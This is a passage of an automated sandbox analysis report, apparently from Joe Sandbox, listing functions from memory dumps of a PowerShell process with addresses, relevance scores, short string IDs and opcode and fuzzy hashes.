                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: 4c917b7f77ede8de1042dbbf55607aec8d56dcffd1efe04f59132feef91440e6
                                                                              • Instruction ID: 59c085f796efe8df1f0a613a60f6842f331850e69c80bd7076c71cf5395ac8bc
                                                                              • Opcode Fuzzy Hash: 4c917b7f77ede8de1042dbbf55607aec8d56dcffd1efe04f59132feef91440e6
                                                                              • Instruction Fuzzy Hash: A3413B70B0135AAFCB249F689814B2ABFE1BF89714F14C46AE548DF391CA71DC84C7A1
                                                                              Function 07D9568F Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q
                                                                              • API String ID: 0-2697143702
                                                                              • Opcode ID: af2c5b24bf7ab1b30a4df5297242ea850969c589677c2262f9a11d18874f6baf
                                                                              • Instruction ID: e3c4f70dd9fcfadc29c89e8d882b54179e7f8b8d78a02a7f16cabfad1314b462
                                                                              • Opcode Fuzzy Hash: af2c5b24bf7ab1b30a4df5297242ea850969c589677c2262f9a11d18874f6baf
                                                                              • Instruction Fuzzy Hash: 7EE0D8B1B493499EDF1A7668B5503ACBBA17F83610F1044BEC48287195CB21C9688752
                                                                              Function 04E92C80 Relevance: .5, Instructions: 546COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: afa886eb9242fbfad396fa465ee21d4fca292e5d7d75b03938af47da11866aa4
                                                                              • Instruction ID: f878569d9d6e5e4ce3df93e2a2c773451de36c6ecac4af08037618703fc0c5e4
                                                                              • Opcode Fuzzy Hash: afa886eb9242fbfad396fa465ee21d4fca292e5d7d75b03938af47da11866aa4
                                                                              • Instruction Fuzzy Hash: 1C326F34A05258AFCF05CFA8D584A9DBBF1BF49314F15859AE444AB3A2C734EC85CB90
                                                                              Function 04E96FA0 Relevance: .3, Instructions: 299COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 887c8952ee938db6fbca37eff1836904d5469b0cd412442c4a3f6f6e8a44ece1
                                                                              • Instruction ID: e6de17408caca92d7a10750af885d3210914f9391e12efeb0a22aadc63c596dd
                                                                              • Opcode Fuzzy Hash: 887c8952ee938db6fbca37eff1836904d5469b0cd412442c4a3f6f6e8a44ece1
                                                                              • Instruction Fuzzy Hash: FFD10774A11209EFCB15CFA8D584A9DFBF2BF48314F248569E804AB3A5C735ED85CB90
                                                                              Function 07D92854 Relevance: .1, Instructions: 125COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3dbab3fb5f4345f9e4c4accfdeb9c7a3344698d33890b815fc6d59d262ebdba7
                                                                              • Instruction ID: 9b2ae7490828622db4014408e01d05d3f51f71df4957fa5026ade2e3853be69f
                                                                              • Opcode Fuzzy Hash: 3dbab3fb5f4345f9e4c4accfdeb9c7a3344698d33890b815fc6d59d262ebdba7
                                                                              • Instruction Fuzzy Hash: 4841C7F1A40315FFCF308A248901A6AFBA2BB95324F5580B6D444DF256DA31ED85CBE1
                                                                              Function 04E93189 Relevance: .1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9f248105ed8bdabc238cb79a475a90b4d4b8ef1266fc8045d1e0c00abc7d772a
                                                                              • Instruction ID: 33a1420521c8bf5ff9e0c740539c380585f9f03090c3ac40fb0ddbb34bae1d89
                                                                              • Opcode Fuzzy Hash: 9f248105ed8bdabc238cb79a475a90b4d4b8ef1266fc8045d1e0c00abc7d772a
                                                                              • Instruction Fuzzy Hash: 2951BA74A00209AFCB54CFA8D584A9DFBF6BF88314F24D559E804AB3A5C735EC85CB50
                                                                              Function 04E96F98 Relevance: .1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae71f10f5ee325cc0c0ad094ec7900b18aaa37b7c28842871a640bf8732e044b
                                                                              • Instruction ID: aa5414eeb698ff60b845557ea50158bcff0dd74c75be6e174dff70bbad4a5a28
                                                                              • Opcode Fuzzy Hash: ae71f10f5ee325cc0c0ad094ec7900b18aaa37b7c28842871a640bf8732e044b
                                                                              • Instruction Fuzzy Hash: EE11E7B4A0020A9FCB00DF98D5809AAFBF5FB89310B148569E919AB351C731FC41CBA1
                                                                              Function 04E9329A Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 896628c9b7a58ee7dc5dcef074597aa9ce43218845c21fa74775a72ea90fd4d4
                                                                              • Instruction ID: aa13ddebe3df386e15c25c0d0b9e192454cd5016cb1c0ae46d03063e832e170a
                                                                              • Opcode Fuzzy Hash: 896628c9b7a58ee7dc5dcef074597aa9ce43218845c21fa74775a72ea90fd4d4
                                                                              • Instruction Fuzzy Hash: B111E934A04219EFCB44CBA8D584E9DFBF1AF48304F24C559E805AB3A5C775EC85CB90
                                                                              Function 035CD01D Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1818959887.00000000035CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_35cd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6e8dfee2fc4eff88f8da0e1b2d9ea50daf0650cb3e98582cfc7bd97d8a5460c
                                                                              • Instruction ID: f7e67dafa95a3956edf2749365af99bf239251add118d0f658bfbea2af9aaae2
                                                                              • Opcode Fuzzy Hash: b6e8dfee2fc4eff88f8da0e1b2d9ea50daf0650cb3e98582cfc7bd97d8a5460c
                                                                              • Instruction Fuzzy Hash: 4501D4710083809EE710CA6EDD84767FFE8EF41368F0CC87DEC089A256D2799841C6B1
                                                                              Function 035CD006 Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1818959887.00000000035CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_35cd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ed92e60db4ae291fdf1ba1c366bf561aac9612a81fefb11977ac0e06eec85f8c
                                                                              • Instruction ID: 6dab5926608dc193346d2edfbdfded8edc42f0faf86306b22eeafff729aeba7e
                                                                              • Opcode Fuzzy Hash: ed92e60db4ae291fdf1ba1c366bf561aac9612a81fefb11977ac0e06eec85f8c
                                                                              • Instruction Fuzzy Hash: BD012D6100E3C09ED7128B259C94B56BFB4EF43224F1DC4DBD8889F2A7D2699848C772
                                                                              Function 04E950F6 Relevance: .0, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1819751361.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 84802ffdb715a1e42a17e7c9091e8bfa895195b8e66e5c492db2da29e8fbec8d
                                                                              • Instruction ID: 075e94c8bab9cb7cf6b7ffd77a971e86a1d652a4503981e67bd1cab8ee8fc509
                                                                              • Opcode Fuzzy Hash: 84802ffdb715a1e42a17e7c9091e8bfa895195b8e66e5c492db2da29e8fbec8d
                                                                              • Instruction Fuzzy Hash: 6CF0DA35A001099FCB15CF9DD990AEEF7B1FF88328F208159E515A72A1C736AC52CB50

                                                                              Non-executed Functions

                                                                              Function 07D906D0 Relevance: 6.4, Strings: 5, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                              • API String ID: 0-578306960
                                                                              • Opcode ID: f3b474629541e6f4f7373617166d8a7457fe96d689d0cf473fada94f3fae17a6
                                                                              • Instruction ID: 84b44f2eb748444c1c71a581a73da57d581f8d000b50fc80012c41623e04929c
                                                                              • Opcode Fuzzy Hash: f3b474629541e6f4f7373617166d8a7457fe96d689d0cf473fada94f3fae17a6
                                                                              • Instruction Fuzzy Hash: AE416CB67043068FDB145B28A810A76FBE5EFC6720F24807AE585CF362CA32CC44C7A1
                                                                              Function 07D91100 Relevance: 5.3, Strings: 4, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: ab8502c3319e51dfcdca1d3047745725805750e26f68d11e2f50bd54d9d64be7
                                                                              • Instruction ID: c1c8b547ee6de78c377cb5608e4d35bf79df49a5da6ee43f221d39327549ab20
                                                                              • Opcode Fuzzy Hash: ab8502c3319e51dfcdca1d3047745725805750e26f68d11e2f50bd54d9d64be7
                                                                              • Instruction Fuzzy Hash: 5581F3B570020ADFDB249AA8D840A6AFBE6BF85214B14C47AD849CB355DE33DD46C7A0
                                                                              Function 07D93E20 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: fa7154ea82c7e895f0341bcdb95dbd78f0866a1e50a2bd0ee5cc21611498c9b5
                                                                              • Instruction ID: d08e3a42933a23a43121099861eb54915d6afc583a26063ca8ea543317aba4db
                                                                              • Opcode Fuzzy Hash: fa7154ea82c7e895f0341bcdb95dbd78f0866a1e50a2bd0ee5cc21611498c9b5
                                                                              • Instruction Fuzzy Hash: ED2136B170030AABDF38896ADC04B3BEBDA9BD5B14F64853AA549CF385DD36CC458361
                                                                              Function 07D90080 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1842082300.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7d90000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: 1f1e5bb86e1628f5ff5e2c1a0d35997e0d53251ab2dc32c3ab9d02d0bf0e0920
                                                                              • Instruction ID: 4482c15dceee5a44ac7833a5e012a1d7d47f652c4e7d397ee6737edaf74354ca
                                                                              • Opcode Fuzzy Hash: 1f1e5bb86e1628f5ff5e2c1a0d35997e0d53251ab2dc32c3ab9d02d0bf0e0920
                                                                              • Instruction Fuzzy Hash: 55014961B4938A0FC72A02283C30626AFB66FC355072940FBC185EF3ABCD158C49C3E6